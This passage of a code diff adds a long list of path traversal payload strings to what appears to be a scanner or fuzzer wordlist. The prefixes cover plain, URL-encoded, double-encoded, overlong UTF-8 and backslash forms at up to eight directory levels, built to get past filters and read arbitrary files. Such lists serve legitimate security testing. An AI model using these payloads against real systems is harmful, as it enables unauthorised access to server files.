+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
